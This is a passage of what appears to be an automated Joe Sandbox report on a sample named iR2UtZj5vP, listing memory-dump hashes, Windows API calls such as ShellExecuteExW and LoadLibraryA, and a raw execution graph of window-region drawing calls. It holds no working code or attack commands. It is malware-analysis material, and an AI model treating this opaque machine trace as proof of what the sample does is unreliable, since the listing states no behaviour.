                                                                        • Opcode Fuzzy Hash: 1196ff106e1f6b960821d47be776ac7f939944b0773f2ca4b6737d61d02c8202
                                                                        • Instruction Fuzzy Hash: EB11A5756002008FEB10DF15D988756FBE8EF04320F0884AADD05CB755E374D804DB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFileType.KERNELBASE(?,00000E24,4C89FF0F,00000000,00000000,00000000,00000000), ref: 00B8AFC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: FileType
                                                                        • String ID:
                                                                        • API String ID: 3081899298-0
                                                                        • Opcode ID: 5c1edfd9e65042951f7138fc992575df045ffbe94245221e5f97b82a9add3eb3
                                                                        • Instruction ID: 19f27fa4bf8aede2917d3efb706157101ad3919c8cf3ebb48b130159eebf8de4
                                                                        • Opcode Fuzzy Hash: 5c1edfd9e65042951f7138fc992575df045ffbe94245221e5f97b82a9add3eb3
                                                                        • Instruction Fuzzy Hash: D001D6B1504240AFE720DB05DD8CBA6F7E8DF44724F148096EE058B791D778E848CBB6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ShellExecuteExW.SHELL32(?), ref: 00B8B360
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: ExecuteShell
                                                                        • String ID:
                                                                        • API String ID: 587946157-0
                                                                        • Opcode ID: 8c6bdba325cb866d04d4d1da492263e35a647c6a0185b4b49bfc2c21027d881a
                                                                        • Instruction ID: fe283bcb806f268bd370ec5a0cb81eebbf402bb2ac397e34614aeaa0146f5e42
                                                                        • Opcode Fuzzy Hash: 8c6bdba325cb866d04d4d1da492263e35a647c6a0185b4b49bfc2c21027d881a
                                                                        • Instruction Fuzzy Hash: 3C014C756002448FDB10DF66D989B66BBE8EF45320F08C4EADD09CB662D774E808DB65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00B8A9CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 07533ea67cb8ae4e551eb712461fb543241d37f1cce8e0919aab0cedf1d080df
                                                                        • Instruction ID: 728b778a114feaf04d38f5d3a333ea49acf9cba1aa035fdc73d7b0868dfd0f55
                                                                        • Opcode Fuzzy Hash: 07533ea67cb8ae4e551eb712461fb543241d37f1cce8e0919aab0cedf1d080df
                                                                        • Instruction Fuzzy Hash: B101DF715046408FEB10DF15DA88752FBE4EF00324F08C4EBDD0A8BB56D274E808CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(?), ref: 00B8A330
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 4211ea4be0b586c10d9e9131863af7737343ca55a50f8ff6e2b090dedda3fb18
                                                                        • Instruction ID: dbaf90fd4ee66bf188184db1ebc4fe3206899cdc0074249b7b2ec1c68037130c
                                                                        • Opcode Fuzzy Hash: 4211ea4be0b586c10d9e9131863af7737343ca55a50f8ff6e2b090dedda3fb18
                                                                        • Instruction Fuzzy Hash: 86F08C359042408FEB109F0AD988761FBE4EF04320F08C0DADD494B762D2B9E808DBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1428220836.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_4d30000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 21e92da0f053ad079c27ad8d2d76e1cb776b1c638961c353e8c57980667e0bd8
                                                                        • Instruction ID: 4123c142fe0b0d53aa6a4a5800e7ab4a03cbe6403ce96bc8199ffbb534c396d2
                                                                        • Opcode Fuzzy Hash: 21e92da0f053ad079c27ad8d2d76e1cb776b1c638961c353e8c57980667e0bd8
                                                                        • Instruction Fuzzy Hash: F6411C302072468BC704FB7AE7895CA77F2AB8530C7508829D4449FF6EDF78594ACB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1428220836.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_4d30000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 774806ab702e299a12222d9daacec8b3f9ab9a36a65af45e37d9a81cdd4815d6
                                                                        • Instruction ID: a87dcf08248f814863da6fded64e50cd54f1e40b641a604fdcaa5b5be12495e7
                                                                        • Opcode Fuzzy Hash: 774806ab702e299a12222d9daacec8b3f9ab9a36a65af45e37d9a81cdd4815d6
                                                                        • Instruction Fuzzy Hash: A701B5726093804FC3173B3894245793BA69BC220974A40FED1418B3E2DB795D0AC3A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1428220836.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_4d30000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 351a87180d37b89cc5d6e5f9d3779504bfa826e3fcd86d7c8ba027d5643685ee
                                                                        • Instruction ID: 37d64af59f1bf70755080a6a01f80a45cf0059e2b6f1cbcd34a8dffa0f87ec81
                                                                        • Opcode Fuzzy Hash: 351a87180d37b89cc5d6e5f9d3779504bfa826e3fcd86d7c8ba027d5643685ee
                                                                        • Instruction Fuzzy Hash: 8701019AA4FBC05FD70302302CA56902F70AEA3109B9E04EBD485CA1A3E40E0A1F9722
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1423968663.0000000000B00000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b00000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b15440ce3af0290539df204d2756825de02ee9e57fc5ab32fe9835e34e3ed871
                                                                        • Instruction ID: 5761474731dca0ce2805742e810929b21595cf5a9964a8e52ab83342dc551a90
                                                                        • Opcode Fuzzy Hash: b15440ce3af0290539df204d2756825de02ee9e57fc5ab32fe9835e34e3ed871
                                                                        • Instruction Fuzzy Hash: A3018BB55097806FDB118F159D44863FFE8EF86620709C4AFED4987752D2256904CBB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1423968663.0000000000B00000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b00000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c41e2fc89c9ed172b3480df71fc0f1572935e27d9ce55f9facafac0f4ad35663
                                                                        • Instruction ID: a67d16be081cbab2c47d58c5f9e788e32475b7c412cc2136f16c6424431bdfc2
                                                                        • Opcode Fuzzy Hash: c41e2fc89c9ed172b3480df71fc0f1572935e27d9ce55f9facafac0f4ad35663
                                                                        • Instruction Fuzzy Hash: 77E092B66046044B9650CF0AED45452F7D8EB84630B08C07FDC0E8B701D67AB508CAA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424128400.0000000000B82000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B82000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b82000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54547b0a5bd6f2c20502af54de95d11dff9dca901ad07fbf340da70d874b5f9f
                                                                        • Instruction ID: 4ae35964c8b1eb2f874297b91a87e23556186025adb90678e18dd7947953229b
                                                                        • Opcode Fuzzy Hash: 54547b0a5bd6f2c20502af54de95d11dff9dca901ad07fbf340da70d874b5f9f
                                                                        • Instruction Fuzzy Hash: 1ED05E792056C14FD316AB1CD2A9F9537D4AB55714F4A44FAA8008B773C768D981D610
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424128400.0000000000B82000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B82000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b82000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 314142aab4d6d50ea450a3d7ce69626ad3bb1711fcc9f677e0d3394df61e7366
                                                                        • Instruction ID: d5a25674378652fcb9bcf5d1738b9cd6c3e99d9b944ddce4c88854e9ca8423fe
                                                                        • Opcode Fuzzy Hash: 314142aab4d6d50ea450a3d7ce69626ad3bb1711fcc9f677e0d3394df61e7366
                                                                        • Instruction Fuzzy Hash: 16D05E342002814FCB16EB1CD2E8F5937D4AB44714F0644E8BC108B772C7A8D9C0DA00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage: 17.9%
                                                                        Dynamic/Decrypted Code Coverage: 0%
                                                                        Signature Coverage: 0%
                                                                        Total number of Nodes: 1147
                                                                        Total number of Limit Nodes: 13
CopyRect 2508->2509 2510 403e10 7 API calls 2509->2510 2511 4054d1 CopyRect 2510->2511 2512 403e10 7 API calls 2511->2512 2513 4054f1 CopyRect 2512->2513 2514 403e10 7 API calls 2513->2514 2515 405511 CopyRect 2514->2515 2516 403e10 7 API calls 2515->2516 2517 405531 CopyRect 2516->2517 2518 403e10 7 API calls 2517->2518 2519 405551 CopyRect 2518->2519 2520 403e10 7 API calls 2519->2520 2521 405571 CopyRect 2520->2521 2522 403e10 7 API calls 2521->2522 2523 405591 CopyRect 2522->2523 2524 403e10 7 API calls 2523->2524 2525 4055b1 CopyRect 2524->2525 2526 403e10 7 API calls 2525->2526 2527 4055d1 CopyRect 2526->2527 2528 403e10 7 API calls 2527->2528 2529 4055f1 CopyRect 2528->2529 2530 403e10 7 API calls 2529->2530 2531 405611 CopyRect 2530->2531 2532 403e10 7 API calls 2531->2532 2533 405631 CopyRect 2532->2533 2534 403e10 7 API calls 2533->2534 2535 405651 CopyRect 2534->2535 2536 403e10 7 API calls 2535->2536 2537 405671 CopyRect 2536->2537 2538 403e10 7 API calls 2537->2538 2539 405691 CopyRect 2538->2539 2540 403e10 7 API calls 2539->2540 2541 4056b1 CopyRect 2540->2541 2542 403e10 7 API calls 2541->2542 2543 4056d1 CopyRect 2542->2543 2544 403e10 7 API calls 2543->2544 2545 4056f1 CopyRect 2544->2545 2546 403e10 7 API calls 2545->2546 2547 405711 CopyRect 2546->2547 2548 403e10 7 API calls 2547->2548 2549 405731 CopyRect 2548->2549 2550 403e10 7 API calls 2549->2550 2551 405751 CopyRect 2550->2551 2552 403e10 7 API calls 2551->2552 2553 405771 SetWindowRgn 2552->2553 2553->2354 2555 405a1d LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 2554->2555 2555->2358 2562 403e3a 2558->2562 2559 403fcd 2560 40404a CreatePolygonRgn 2559->2560 2561 403fdf CreatePolygonRgn 2559->2561 2568 404058 2560->2568 2563 403fef 2561->2563 2562->2559 2564 403f74 _ftol _ftol 2562->2564 2565 403ffa CombineRgn CreatePolygonRgn 2563->2565 2564->2559 2564->2564 2566 40ae02 2565->2566 2567 40401e CombineRgn 2566->2567 2567->2568 2568->2485 2954 40aac0 GetClientRect 2958 404ec0 
CopyRect 2954->2958 2956 40ab29 LoadCursorA SetCursor 2957 40aae6 2957->2956 3037 403c20 2958->3037 2960 404ef1 2961 404f06 CopyRect 2960->2961 2962 404ef8 2960->2962 2963 403c20 4 API calls 2961->2963 2962->2957 2964 404f23 2963->2964 2965 404f38 CopyRect 2964->2965 2966 404f2a 2964->2966 2967 403c20 4 API calls 2965->2967 2966->2957 2968 404f55 2967->2968 2969 404f6a CopyRect 2968->2969 2970 404f5c 2968->2970 2971 403c20 4 API calls 2969->2971 2970->2957 2972 404f87 2971->2972 2973 404f9c CopyRect 2972->2973 2974 404f8e 2972->2974 2975 403c20 4 API calls 2973->2975 2974->2957 2976 404fb9 2975->2976 2977 404fc0 2976->2977 2978 404fce CopyRect 2976->2978 2977->2957 2979 403c20 4 API calls 2978->2979 2980 404feb 2979->2980 2981 405000 CopyRect 2980->2981 2982 404ff2 2980->2982 2983 403c20 4 API calls 2981->2983 2982->2957 2984 40501d 2983->2984 2985 405032 CopyRect 2984->2985 2986 405024 2984->2986 2987 403c20 4 API calls 2985->2987 2986->2957 2988 40504f 2987->2988 2989 405064 CopyRect 2988->2989 2990 405056 2988->2990 2991 403c20 4 API calls 2989->2991 2990->2957 2992 405081 2991->2992 2993 405096 CopyRect 2992->2993 2994 405088 2992->2994 2995 403c20 4 API calls 2993->2995 2994->2957 2996 4050b3 2995->2996 2997 4050c8 CopyRect 2996->2997 2998 4050ba 2996->2998 2999 403c20 4 API calls 2997->2999 2998->2957 3000 4050e5 2999->3000 3001 4050fa CopyRect 3000->3001 3002 4050ec 3000->3002 3003 403c20 4 API calls 3001->3003 3002->2957 3004 405117 3003->3004 3005 40512c CopyRect 3004->3005 3006 40511e 3004->3006 3007 403c20 4 API calls 3005->3007 3006->2957 3008 405149 3007->3008 3009 405150 3008->3009 3010 40515e CopyRect 3008->3010 3009->2957 3011 403c20 4 API calls 3010->3011 3012 40517b 3011->3012 3013 405190 CopyRect 3012->3013 3014 405182 3012->3014 3015 403c20 4 API calls 3013->3015 3014->2957 3016 4051ad 3015->3016 3017 4051c2 CopyRect 3016->3017 3018 4051b4 3016->3018 3019 403c20 4 API calls 3017->3019 3018->2957 3020 4051df 3019->3020 3021 4051f4 CopyRect 
3020->3021 3022 4051e6 3020->3022 3023 403c20 4 API calls 3021->3023 3022->2957 3024 405211 3023->3024 3025 405226 CopyRect 3024->3025 3026 405218 3024->3026 3027 403c20 4 API calls 3025->3027 3026->2957 3028 405243 3027->3028 3029 405258 CopyRect 3028->3029 3030 40524a 3028->3030 3031 403c20 4 API calls 3029->3031 3030->2957 3032 405275 3031->3032 3033 40528a CopyRect 3032->3033 3034 40527c 3032->3034 3035 403c20 4 API calls 3033->3035 3034->2957 3036 4052a7 3035->3036 3036->2957 3039 403d04 3037->3039 3038 403d94 CreatePolygonRgn 3040 403dad 3038->3040 3039->3038 3041 403d37 _ftol _ftol 3039->3041 3042 403db1 PtInRegion 3040->3042 3044 403dca 3040->3044 3041->3041 3043 403d90 3041->3043 3042->3044 3043->3038 3044->2960 3053 40ac80 ExtTextOutA 3054 409c80 3063 401000 CopyRect 3054->3063 3056 409cf3 _ftol _ftol _ftol 3057 40afbe 3056->3057 3058 409d7d GetWindowRect 3057->3058 3059 409d98 3058->3059 3064 402500 CopyRect 3059->3064 3062 409dd5 3063->3056 3065 403e10 7 API calls 3064->3065 3066 402531 CopyRect 3065->3066 3395 404850 3066->3395 3068 402551 CopyRect 3069 403e10 7 API calls 3068->3069 3070 402571 CopyRect 3069->3070 3396 404850 3070->3396 3072 402591 CopyRect 3073 403e10 7 API calls 3072->3073 3074 4025b1 CopyRect 3073->3074 3397 404850 3074->3397 3076 4025d1 CopyRect 3077 403e10 7 API calls 3076->3077 3078 4025f1 CopyRect 3077->3078 3398 404850 3078->3398 3080 402611 CopyRect 3081 403e10 7 API calls 3080->3081 3082 402631 CopyRect 3081->3082 3399 404850 3082->3399 3084 402651 CopyRect 3085 403e10 7 API calls 3084->3085 3086 402671 CopyRect 3085->3086 3400 404850 3086->3400 3088 402691 CopyRect 3089 403e10 7 API calls 3088->3089 3090 4026b1 CopyRect 3089->3090 3401 404850 3090->3401 3092 4026d1 CopyRect 3093 403e10 7 API calls 3092->3093 3094 4026f1 CopyRect 3093->3094 3402 404850 3094->3402 3096 402711 CopyRect 3097 403e10 7 API calls 3096->3097 3098 402731 CopyRect 3097->3098 3403 404850 3098->3403 3100 402751 CopyRect 3101 403e10 7 API calls 
3100->3101 3102 402771 CopyRect 3101->3102 3404 404850 3102->3404 3104 402791 CopyRect 3105 403e10 7 API calls 3104->3105 3106 4027b1 CopyRect 3105->3106 3405 404850 3106->3405 3108 4027d1 CopyRect 3109 403e10 7 API calls 3108->3109 3110 4027f1 CopyRect 3109->3110 3406 404850 3110->3406 3112 402811 CopyRect 3113 403e10 7 API calls 3112->3113 3114 402831 CopyRect 3113->3114 3407 404850 3114->3407 3116 402851 CopyRect 3117 403e10 7 API calls 3116->3117 3118 402871 CopyRect 3117->3118 3408 404850 3118->3408 3120 402891 CopyRect 3121 403e10 7 API calls 3120->3121 3122 4028b1 CopyRect 3121->3122 3409 404850 3122->3409 3124 4028d1 CopyRect 3125 403e10 7 API calls 3124->3125 3126 4028f1 CopyRect 3125->3126 3410 404850 3126->3410 3128 402911 CopyRect 3129 403e10 7 API calls 3128->3129 3130 402931 CopyRect 3129->3130 3411 404850 3130->3411 3132 402951 CopyRect 3133 403e10 7 API calls 3132->3133 3134 402971 CopyRect 3133->3134 3412 404850 3134->3412 3136 402991 CopyRect 3137 403e10 7 API calls 3136->3137 3138 4029b1 CopyRect 3137->3138 3413 404850 3138->3413 3140 4029d1 CopyRect 3141 403e10 7 API calls 3140->3141 3142 4029f1 CopyRect 3141->3142 3414 404850 3142->3414 3144 402a11 CopyRect 3145 403e10 7 API calls 3144->3145 3146 402a31 CopyRect 3145->3146 3415 404850 3146->3415 3148 402a51 CopyRect 3149 403e10 7 API calls 3148->3149 3150 402a71 CopyRect 3149->3150 3416 404850 3150->3416 3152 402a91 CopyRect 3153 403e10 7 API calls 3152->3153 3154 402ab1 CopyRect 3153->3154 3417 404850 3154->3417 3156 402ad1 CopyRect 3157 403e10 7 API calls 3156->3157 3158 402af1 CopyRect 3157->3158 3418 404850 3158->3418 3160 402b11 CopyRect 3161 403e10 7 API calls 3160->3161 3162 402b31 CopyRect 3161->3162 3419 404850 3162->3419 3164 402b51 CopyRect 3165 403e10 7 API calls 3164->3165 3166 402b71 CopyRect 3165->3166 3420 404850 3166->3420 3168 402b91 CopyRect 3169 403e10 7 API calls 3168->3169 3170 402bb1 CopyRect 3169->3170 3421 404850 3170->3421 3172 402bd1 CopyRect 3173 403e10 7 API calls 
3172->3173 3174 402bf1 CopyRect 3173->3174 3422 404850 3174->3422 3176 402c11 CopyRect 3177 403e10 7 API calls 3176->3177 3178 402c31 CopyRect 3177->3178 3423 404850 3178->3423 3180 402c51 CopyRect 3181 403e10 7 API calls 3180->3181 3182 402c71 CopyRect 3181->3182 3424 404850 3182->3424 3184 402c91 CopyRect 3185 403e10 7 API calls 3184->3185 3186 402cb1 CopyRect 3185->3186 3425 404850 3186->3425 3188 402cd1 CopyRect 3189 403e10 7 API calls 3188->3189 3190 402cf1 CopyRect 3189->3190 3426 404850 3190->3426 3192 402d11 CopyRect 3193 403e10 7 API calls 3192->3193 3194 402d31 CopyRect 3193->3194 3427 404850 3194->3427 3196 402d51 CopyRect 3197 403e10 7 API calls 3196->3197 3198 402d71 CopyRect 3197->3198 3428 404850 3198->3428 3200 402d91 CopyRect 3201 403e10 7 API calls 3200->3201 3202 402db1 CopyRect 3201->3202 3429 404850 3202->3429 3204 402dd1 CopyRect 3205 403e10 7 API calls 3204->3205 3206 402df1 CopyRect 3205->3206 3430 404850 3206->3430 3208 402e11 CopyRect 3209 403e10 7 API calls 3208->3209 3210 402e31 CopyRect 3209->3210 3431 404850 3210->3431 3212 402e51 CopyRect 3213 403e10 7 API calls 3212->3213 3214 402e71 CopyRect 3213->3214 3432 404850 3214->3432 3216 402e91 CopyRect 3217 403e10 7 API calls 3216->3217 3218 402eb1 CopyRect 3217->3218 3433 404850 3218->3433 3220 402ed1 CopyRect 3221 403e10 7 API calls 3220->3221 3222 402ef1 CopyRect 3221->3222 3434 404850 3222->3434 3224 402f11 CopyRect 3225 403e10 7 API calls 3224->3225 3226 402f31 CopyRect 3225->3226 3435 404850 3226->3435 3228 402f51 CopyRect 3229 403e10 7 API calls 3228->3229 3230 402f71 CopyRect 3229->3230 3436 404850 3230->3436 3232 402f91 CopyRect 3233 403e10 7 API calls 3232->3233 3234 402fb1 CopyRect 3233->3234 3437 404850 3234->3437 3236 402fd1 CopyRect 3237 403e10 7 API calls 3236->3237 3238 402ff1 CopyRect 3237->3238 3438 404850 3238->3438 3240 403011 CopyRect 3241 403e10 7 API calls 3240->3241 3242 403031 CopyRect 3241->3242 3439 404850 3242->3439 3244 403051 CopyRect 3245 403e10 7 API calls 
3244->3245 3246 403071 CopyRect 3245->3246 3440 404850 3246->3440 3248 403091 CopyRect 3249 403e10 7 API calls 3248->3249 3250 4030b1 CopyRect 3249->3250 3441 404850 3250->3441 3252 4030d1 CopyRect 3253 403e10 7 API calls 3252->3253 3254 4030f1 CopyRect 3253->3254 3442 404850 3254->3442 3256 403111 CopyRect 3257 403e10 7 API calls 3256->3257 3258 403131 CopyRect 3257->3258 3443 404850 3258->3443 3260 403151 CopyRect 3261 403e10 7 API calls 3260->3261 3262 403171 CopyRect 3261->3262 3444 404850 3262->3444 3264 403191 CopyRect 3265 403e10 7 API calls 3264->3265 3266 4031b1 CopyRect 3265->3266 3445 404850 3266->3445 3268 4031d1 CopyRect 3269 403e10 7 API calls 3268->3269 3270 4031f1 CopyRect 3269->3270 3446 404850 3270->3446 3272 403211 CopyRect 3273 403e10 7 API calls 3272->3273 3274 403231 CopyRect 3273->3274 3447 404850 3274->3447 3276 403251 CopyRect 3277 403e10 7 API calls 3276->3277 3278 403271 CopyRect 3277->3278 3448 404850 3278->3448 3280 403291 CopyRect 3281 403e10 7 API calls 3280->3281 3282 4032b1 CopyRect 3281->3282 3449 404850 3282->3449 3284 4032d1 CopyRect 3285 403e10 7 API calls 3284->3285 3286 4032f1 CopyRect 3285->3286 3450 404850 3286->3450 3288 403311 CopyRect 3289 403e10 7 API calls 3288->3289 3290 403331 CopyRect 3289->3290 3451 404850 3290->3451 3292 403351 CopyRect 3293 403e10 7 API calls 3292->3293 3294 403371 CopyRect 3293->3294 3452 404850 3294->3452 3296 403391 CopyRect 3297 403e10 7 API calls 3296->3297 3298 4033b1 CopyRect 3297->3298 3453 404850 3298->3453 3300 4033d1 CopyRect 3301 403e10 7 API calls 3300->3301 3302 4033f1 CopyRect 3301->3302 3454 404850 3302->3454 3304 403411 CopyRect 3305 403e10 7 API calls 3304->3305 3306 403431 CopyRect 3305->3306 3455 404850 3306->3455 3308 403451 CopyRect 3309 403e10 7 API calls 3308->3309 3310 403471 CopyRect 3309->3310 3456 404850 3310->3456 3312 403491 CopyRect 3313 403e10 7 API calls 3312->3313 3314 4034b1 CopyRect 3313->3314 3457 404850 3314->3457 3316 4034d1 CopyRect 3317 403e10 7 API calls 
3316->3317 3318 4034f1 CopyRect 3317->3318 3458 404850 3318->3458 3320 403511 CopyRect 3321 403e10 7 API calls 3320->3321 3322 403531 CopyRect 3321->3322 3459 404850 3322->3459 3324 403551 CopyRect 3325 403e10 7 API calls 3324->3325 3326 403571 CopyRect 3325->3326 3460 404850 3326->3460 3328 403591 CopyRect 3329 403e10 7 API calls 3328->3329 3330 4035b1 CopyRect 3329->3330 3461 404850 3330->3461 3332 4035d1 CopyRect 3333 403e10 7 API calls 3332->3333 3334 4035f1 CopyRect 3333->3334 3462 404850 3334->3462 3336 403611 CopyRect 3337 403e10 7 API calls 3336->3337 3338 403631 CopyRect 3337->3338 3463 404850 3338->3463 3340 403651 CopyRect 3341 403e10 7 API calls 3340->3341 3342 403671 CopyRect 3341->3342 3343 403e10 7 API calls 3342->3343 3344 403691 CopyRect 3343->3344 3464 404360 3344->3464 3346 4036b1 CopyRect 3347 403e10 7 API calls 3346->3347 3348 4036d1 CopyRect 3347->3348 3349 404360 7 API calls 3348->3349 3350 4036f1 CopyRect 3349->3350 3351 403e10 7 API calls 3350->3351 3352 403711 CopyRect 3351->3352 3353 404360 7 API calls 3352->3353 3354 403731 CopyRect 3353->3354 3355 404360 7 API calls 3354->3355 3356 403751 CopyRect 3355->3356 3357 403e10 7 API calls 3356->3357 3358 403771 CopyRect 3357->3358 3359 404360 7 API calls 3358->3359 3360 403791 CopyRect 3359->3360 3361 403e10 7 API calls 3360->3361 3362 4037b1 CopyRect 3361->3362 3363 404360 7 API calls 3362->3363 3364 4037d1 CopyRect 3363->3364 3365 403e10 7 API calls 3364->3365 3366 4037f1 CopyRect 3365->3366 3367 404360 7 API calls 3366->3367 3368 403811 CopyRect 3367->3368 3369 404360 7 API calls 3368->3369 3370 403831 CopyRect 3369->3370 3371 404360 7 API calls 3370->3371 3372 403851 CopyRect 3371->3372 3373 403e10 7 API calls 3372->3373 3374 403871 CopyRect 3373->3374 3375 403e10 7 API calls 3374->3375 3376 403891 CopyRect 3375->3376 3377 404360 7 API calls 3376->3377 3378 4038b1 CopyRect 3377->3378 3379 403e10 7 API calls 3378->3379 3380 4038d1 CopyRect 3379->3380 3381 403e10 7 API calls 3380->3381 3382 
4038f1 CopyRect 3381->3382 3383 404360 7 API calls 3382->3383 3384 403911 CopyRect 3383->3384 3385 404360 7 API calls 3384->3385 3386 403931 CopyRect 3385->3386 3387 403e10 7 API calls 3386->3387 3388 403951 CopyRect 3387->3388 3389 404360 7 API calls 3388->3389 3390 403971 CopyRect 3389->3390 3391 404360 7 API calls 3390->3391 3392 403991 CopyRect 3391->3392 3393 404360 7 API calls 3392->3393 3394 4039b1 SetWindowRgn SetCapture 3393->3394 3394->3062 3395->3068 3396->3072 3397->3076 3398->3080 3399->3084 3400->3088 3401->3092 3402->3096 3403->3100 3404->3104 3405->3108 3406->3112 3407->3116 3408->3120 3409->3124 3410->3128 3411->3132 3412->3136 3413->3140 3414->3144 3415->3148 3416->3152 3417->3156 3418->3160 3419->3164 3420->3168 3421->3172 3422->3176 3423->3180 3424->3184 3425->3188 3426->3192 3427->3196 3428->3200 3429->3204 3430->3208 3431->3212 3432->3216 3433->3220 3434->3224 3435->3228 3436->3232 3437->3236 3438->3240 3439->3244 3440->3248 3441->3252 3442->3256 3443->3260 3444->3264 3445->3268 3446->3272 3447->3276 3448->3280 3449->3284 3450->3288 3451->3292 3452->3296 3453->3300 3454->3304 3455->3308 3456->3312 3457->3316 3458->3320 3459->3324 3460->3328 3461->3332 3462->3336 3463->3340 3468 4043a3 3464->3468 3465 40454a 3466 404560 CreatePolygonRgn 3465->3466 3467 4045cb CreatePolygonRgn 3465->3467 3469 404570 3466->3469 3474 4045d9 3467->3474 3468->3465 3470 4044e9 _ftol _ftol 3468->3470 3471 40457b CombineRgn CreatePolygonRgn 3469->3471 3470->3465 3470->3470 3472 40ae02 3471->3472 3473 40459f CombineRgn 3472->3473 3473->3474 3474->3346 3476 40a940 GetWindowRect 3477 40aa54 ClientToScreen 3476->3477 3478 40a99f 3476->3478 3480 40aa52 3477->3480 3478->3480 3488 4052c0 CopyRect 3478->3488 3481 40a9d0 _ftol 3481->3480 3482 40a9ec 3481->3482 3482->3480 3483 40aa08 GetWindowRect 3482->3483 3484 40aa1f 3483->3484 3485 405300 42 API calls 3484->3485 3486 40aa30 SetWindowRgn 3485->3486 3489 40a440 IsIconic 3486->3489 3488->3481 3490 40a474 3489->3490 3492 40a50d 
